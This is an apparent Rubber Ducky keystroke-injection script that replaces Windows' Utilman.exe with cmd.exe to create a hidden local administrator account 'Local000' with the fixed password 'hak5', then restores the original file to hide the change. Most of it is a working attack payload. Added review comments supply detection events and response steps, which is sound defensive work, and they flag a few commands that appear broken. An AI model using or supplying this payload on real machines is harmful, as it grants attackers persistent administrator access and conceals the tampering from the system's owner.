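Uses the Utilman.exe exploit to create a new local administrator account “Local000” with the password “hak5”. The payload is typed as injected keystrokes into an unlocked Windows session and appears to rely on that session's user being able to approve an elevation prompt.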
|
|
|
|
REM Author: Xcellerator
|
|
REM Description: Utilman Exploiter to create a new Admin Account
|
|
REM The new account will be called "Local000".
|
|
REM Phase 1: press the Windows key, type "cmd", then send the context-menu
REM key, the letter "a", ENTER, LEFT and ENTER.
REM NOTE(review): presumably "a" selects "Run as administrator" and
REM LEFT + ENTER confirms the UAC consent dialog - confirm per Windows version.
REM If so, this phase depends on the logged-in user being able to approve
REM elevation without typing credentials; a standard-user session would stop
REM at a credential prompt instead.
GUI
|
|
DELAY 50
|
|
STRING cmd
|
|
MENU
|
|
STRING a
|
|
ENTER
|
|
LEFT
|
|
ENTER
|
|
REM Longer pause than the other delays in the script; presumably waits for
REM the console window to take focus before typing commands.
DELAY 200
|
|
REM Phase 2: typed into the console opened earlier in the script.
REM takeown and icacls change the owner of System32\Utilman.exe and grant the
REM Administrators group full control. The remaining lines stage a copy of
REM cmd.exe in a temporary "util" directory, rename the original binary to
REM Utilman.exe.bak and rename the staged copy to Utilman.exe.
REM The intent is accessibility-binary replacement (MITRE ATT&CK T1546.008).
REM Detection: process-creation logging with command lines (Security event
REM 4688 with command-line auditing, or Sysmon Event ID 1) showing takeown or
REM icacls against Utilman.exe, and file-integrity monitoring on the
REM accessibility binaries in System32.
STRING takeown /f "%systemroot%\System32\Utilman.exe"
|
|
ENTER
|
|
DELAY 50
|
|
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
|
|
ENTER
|
|
DELAY 50
|
|
STRING cd %systemroot%\System32
|
|
ENTER
|
|
DELAY 50
|
|
STRING mkdir util
|
|
ENTER
|
|
STRING xcopy cmd.exe util\
|
|
ENTER
|
|
DELAY 50
|
|
REM The original binary is kept under a .bak name, so a Utilman.exe.bak in
REM System32 is itself an artifact worth alerting on.
STRING ren Utilman.exe Utilman.exe.bak
|
|
ENTER
|
|
STRING cd util
|
|
ENTER
|
|
DELAY 50
|
|
STRING ren cmd.exe Utilman.exe
|
|
ENTER
|
|
DELAY 50
|
|
STRING cd ..
|
|
ENTER
|
|
DELAY 50
|
|
REM NOTE(review): the resulting on-disk state after this copy cannot be
REM confirmed from the listing alone; treat the description above as intent.
STRING xcopy util/Utilman.exe \
|
|
ENTER
|
|
DELAY 50
|
|
REM Removes the staging directory, then closes the console.
STRING rmdir /s /q util
|
|
ENTER
|
|
DELAY 50
|
|
STRING exit
|
|
ENTER
|
|
DELAY 50
|
|
REM Phase 3: GUI u sends Win+U, the Windows accessibility shortcut.
REM NOTE(review): the script evidently expects a command prompt to receive
REM the lines that follow - confirm against the target Windows version.
REM The two net commands create the local account "Local000" and add it to
REM the local Administrators group.
REM Detection: Security event 4720 (user account created) and 4732 (member
REM added to a security-enabled local group); alert on any local
REM administrator created outside the normal provisioning process.
GUI u
|
|
STRING net user Local000 /add
|
|
ENTER
|
|
DELAY 50
|
|
STRING net localgroup administrators Local000 /add
|
|
ENTER
|
|
DELAY 50
|
|
STRING exit
|
|
ENTER
|
|
DELAY 50
|
|
REM Phase 4 (cleanup): opens the Run dialog (Win+R), starts cmd, changes to
REM System32 and types lines intended to remove the replaced Utilman.exe and
REM rename Utilman.exe.bak back to Utilman.exe.
REM Because the file layout is meant to look unmodified afterwards, on-disk
REM inspection alone may miss the change: rely on process-creation and
REM account-management logs, and verify the Utilman.exe hash and signature
REM against a known-good copy during response.
GUI r
|
|
STRING cmd
|
|
ENTER
|
|
DELAY 50
|
|
STRING cd "%systemroot%\System32"
|
|
ENTER
|
|
DELAY 50
|
|
STRING delete Utilman.exe
|
|
ENTER
|
|
DELAY 50
|
|
REM Types "y", presumably to answer a confirmation prompt - confirm.
STRING y
|
|
ENTER
|
|
DELAY 50
|
|
STRING ren Utilman.exe.bak Utilman.exe
|
|
ENTER
|
|
DELAY 50
|
|
STRING exit
|
|
ENTER
|
|
REM Phase 5: repeats the Windows key / "cmd" / context-menu / "a" / ENTER /
REM LEFT / ENTER sequence used at the start of the script.
REM NOTE(review): presumably this opens another elevated prompt - confirm.
REM "net user Local000 *" makes net prompt for a new password; the script
REM then types "hak5" twice (entry and confirmation).
REM The account name and password are fixed and published with the payload,
REM so a local account named "Local000" is a usable indicator.
REM Detection: Security event 4724 (attempt to reset an account's password).
REM Response: disable or remove the account and review its logons (4624).
GUI
|
|
STRING cmd
|
|
MENU
|
|
STRING a
|
|
ENTER
|
|
DELAY 50
|
|
LEFT
|
|
ENTER
|
|
DELAY 200
|
|
STRING net user Local000 *
|
|
ENTER
|
|
STRING hak5
|
|
ENTER
|
|
STRING hak5
|
|
ENTER
|
|
STRING exit
|
|
ENTER |